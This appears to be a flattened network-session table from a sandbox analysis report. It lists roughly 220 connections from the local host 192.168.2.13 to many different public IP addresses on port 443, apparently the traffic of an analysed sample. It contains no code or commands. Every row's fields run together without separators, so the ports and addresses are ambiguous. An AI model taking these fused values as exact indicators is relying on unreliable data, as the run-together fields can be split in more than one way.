                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21881192.168.2.1353704223.255.23.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21882192.168.2.135912695.7.226.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21883192.168.2.13381049.180.81.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21884192.168.2.135307024.124.232.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21885192.168.2.135706692.82.221.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21886192.168.2.1358980212.52.143.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21887192.168.2.13584444.219.11.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21888192.168.2.1340682145.179.49.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21889192.168.2.1357128167.87.110.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21890192.168.2.1347978115.66.170.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21891192.168.2.1346192129.138.239.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21892192.168.2.1339410153.223.138.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21893192.168.2.1360574115.249.137.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21894192.168.2.13538024.252.246.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21895192.168.2.1356250190.182.71.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21896192.168.2.1354184204.252.166.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21897192.168.2.133385259.105.183.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21898192.168.2.133388640.96.54.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21899192.168.2.1337526122.189.0.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21900192.168.2.1357954166.226.147.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21901192.168.2.1354816145.171.96.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21902192.168.2.133526623.227.236.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21903192.168.2.1354990210.0.221.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21904192.168.2.1351742136.70.238.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21905192.168.2.133930641.191.182.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21906192.168.2.133343498.86.139.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21907192.168.2.1347770163.167.204.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21908192.168.2.1347302193.15.60.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21909192.168.2.1342956197.106.209.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21910192.168.2.135207665.174.252.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21911192.168.2.133772824.58.236.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21912192.168.2.135383425.22.73.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21913192.168.2.134742013.218.99.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21914192.168.2.133974073.96.182.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21915192.168.2.133934640.68.231.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21916192.168.2.1334344199.238.93.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21917192.168.2.135202057.187.48.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21918192.168.2.133352885.219.145.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21919192.168.2.1360432212.219.243.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21920192.168.2.1349746111.215.102.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21921192.168.2.1333896146.207.31.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21922192.168.2.1359842149.231.59.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21923192.168.2.1342152155.96.184.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21924192.168.2.1342104157.107.83.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21925192.168.2.134067483.129.16.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21926192.168.2.1339330213.165.25.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21927192.168.2.134700614.249.185.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21928192.168.2.133546881.72.125.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21929192.168.2.1340486203.254.149.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21930192.168.2.1340086166.11.99.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21931192.168.2.1344700178.153.45.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21932192.168.2.13447222.103.3.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21933192.168.2.134815872.225.68.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21934192.168.2.134380266.239.10.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21935192.168.2.13603869.131.211.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21936192.168.2.135929248.133.221.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21937192.168.2.1360684131.57.191.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21938192.168.2.1349014107.91.32.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21939192.168.2.1343156107.33.255.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21940192.168.2.134776857.113.141.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21941192.168.2.134348294.129.73.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21942192.168.2.1356368180.39.143.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21943192.168.2.1347276158.42.172.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21944192.168.2.133708445.238.204.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21945192.168.2.1356518118.157.45.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21946192.168.2.1358960185.38.61.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21947192.168.2.135764099.99.103.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21948192.168.2.1335690126.193.132.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21949192.168.2.1340284144.235.43.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21950192.168.2.1351148218.87.159.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21951192.168.2.13423349.225.102.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21952192.168.2.1356334146.198.143.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21953192.168.2.1348376187.251.81.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21954192.168.2.133540227.129.81.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21955192.168.2.1335888193.171.36.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21956192.168.2.134202617.171.35.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21957192.168.2.1358414212.203.241.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21958192.168.2.1337006109.217.54.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21959192.168.2.133998040.180.13.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21960192.168.2.134143462.100.129.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21961192.168.2.1345436158.241.214.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21962192.168.2.1348422177.108.188.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21963192.168.2.13597989.19.62.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21964192.168.2.134355437.142.160.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21965192.168.2.135456274.241.109.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21966192.168.2.134779479.207.181.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21967192.168.2.135307072.250.150.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21968192.168.2.1350988179.98.169.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21969192.168.2.1352492135.22.63.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21970192.168.2.1337798113.147.16.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21971192.168.2.134086846.66.33.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21972192.168.2.1350488116.69.44.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21973192.168.2.1351698145.186.97.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21974192.168.2.135180017.108.241.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21975192.168.2.1346266186.192.96.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21976192.168.2.134044444.77.41.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21977192.168.2.1341468201.191.23.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21978192.168.2.135059613.15.183.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21979192.168.2.1350384176.123.86.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21980192.168.2.1334784152.11.62.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21981192.168.2.135960291.189.166.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21982192.168.2.1360654173.197.68.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21983192.168.2.1342494160.156.142.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21984192.168.2.1350256165.226.65.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21985192.168.2.134923850.4.29.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21986192.168.2.1353342161.237.53.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21987192.168.2.134864663.198.51.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21988192.168.2.1350482165.208.126.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21989192.168.2.1350404199.187.95.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21990192.168.2.1354730117.225.2.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21991192.168.2.134146212.84.248.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21992192.168.2.1355580161.223.215.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21993192.168.2.1357506148.8.142.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21994192.168.2.134298279.235.25.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21995192.168.2.133630813.202.183.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21996192.168.2.1339906138.242.0.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21997192.168.2.135936617.1.190.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21998192.168.2.1335284137.159.116.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21999192.168.2.133515440.98.162.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22000192.168.2.1358670190.221.57.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22001192.168.2.133546885.104.55.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22002192.168.2.135699817.163.54.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22003192.168.2.1335808122.217.150.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22004192.168.2.133997071.213.44.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22005192.168.2.134374052.220.137.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22006192.168.2.1355366165.120.180.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22007192.168.2.1346614102.134.216.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22008192.168.2.135535671.89.94.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22009192.168.2.1355852222.255.44.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22010192.168.2.133775287.101.9.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22011192.168.2.1333254204.245.9.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22012192.168.2.134769635.87.156.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22013192.168.2.135171890.73.194.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22014192.168.2.134983223.152.72.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22015192.168.2.1338678185.99.111.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22016192.168.2.133362269.139.107.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22017192.168.2.1342618184.158.111.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22018192.168.2.134393660.131.252.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22019192.168.2.1357930108.110.176.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22020192.168.2.133429631.24.143.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22021192.168.2.135744480.187.196.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22022192.168.2.133945469.130.44.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22023192.168.2.1353570146.167.61.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22024192.168.2.1337454187.113.22.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22025192.168.2.135551468.34.45.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22026192.168.2.135952676.16.55.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22027192.168.2.135929061.97.29.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22028192.168.2.13466428.87.84.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22029192.168.2.135248270.119.34.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22030192.168.2.1345214161.109.122.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22031192.168.2.1348954182.16.48.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22032192.168.2.1335738200.27.241.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22033192.168.2.1334546185.123.80.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22034192.168.2.1356666182.208.156.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22035192.168.2.1345826181.70.114.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22036192.168.2.1336420202.188.60.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22037192.168.2.135656088.12.36.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22038192.168.2.1344472101.40.239.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22039192.168.2.133363242.13.69.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22040192.168.2.1358642203.189.36.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22041192.168.2.135355634.7.167.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22042192.168.2.13503905.106.122.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22043192.168.2.136026231.97.76.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22044192.168.2.13510964.206.138.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22045192.168.2.134447271.59.128.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22046192.168.2.1341546130.15.95.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22047192.168.2.1343782183.51.159.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22048192.168.2.133652050.179.189.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22049192.168.2.135858285.15.144.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22050192.168.2.135365281.128.141.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22051192.168.2.1360064122.164.173.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22052192.168.2.1345202113.158.140.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22053192.168.2.1347886129.198.109.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22054192.168.2.1357180221.203.118.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22055192.168.2.1353298175.216.85.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22056192.168.2.1350364122.110.188.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22057192.168.2.1352732176.19.135.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22058192.168.2.1359706220.82.241.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22059192.168.2.1334690164.115.194.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22060192.168.2.1347852208.49.135.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22061192.168.2.1340686221.212.28.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22062192.168.2.1359054170.46.228.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22063192.168.2.1353674154.163.166.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22064192.168.2.1349006123.80.159.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22065192.168.2.1339790151.84.220.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22066192.168.2.1351618142.171.105.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22067192.168.2.1349466162.114.243.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22068192.168.2.135480257.116.216.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22069192.168.2.1339098116.180.187.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22070192.168.2.1360624190.70.165.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22071192.168.2.134134093.93.7.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22072192.168.2.134477024.113.76.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22073192.168.2.134663836.12.194.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22074192.168.2.1342582222.40.29.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22075192.168.2.133852896.196.52.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22076192.168.2.135912253.148.147.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22077192.168.2.1358618123.200.159.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22078192.168.2.1337690147.77.132.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22079192.168.2.1338538147.186.234.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22080192.168.2.133447012.251.46.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22081192.168.2.1356148171.28.148.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22082192.168.2.1352962140.170.93.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22083192.168.2.134272896.201.93.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22084192.168.2.1336328173.124.45.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22085192.168.2.1340376193.97.200.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22086192.168.2.1354752190.27.155.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22087192.168.2.1354732186.142.209.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22088192.168.2.133586614.36.164.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22089192.168.2.1345434199.174.16.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22090192.168.2.1358520192.89.160.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22091192.168.2.1347490122.119.174.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22092192.168.2.133660036.40.67.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22093192.168.2.1333776103.17.253.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22094192.168.2.133413473.146.20.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22095192.168.2.1355944144.56.167.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22096192.168.2.1353580203.228.54.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22097192.168.2.134053444.117.3.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22098192.168.2.1333772183.49.129.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22099192.168.2.133632297.19.243.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22100192.168.2.1352168201.13.72.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22101192.168.2.134476053.215.243.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22102192.168.2.134494878.128.219.150443
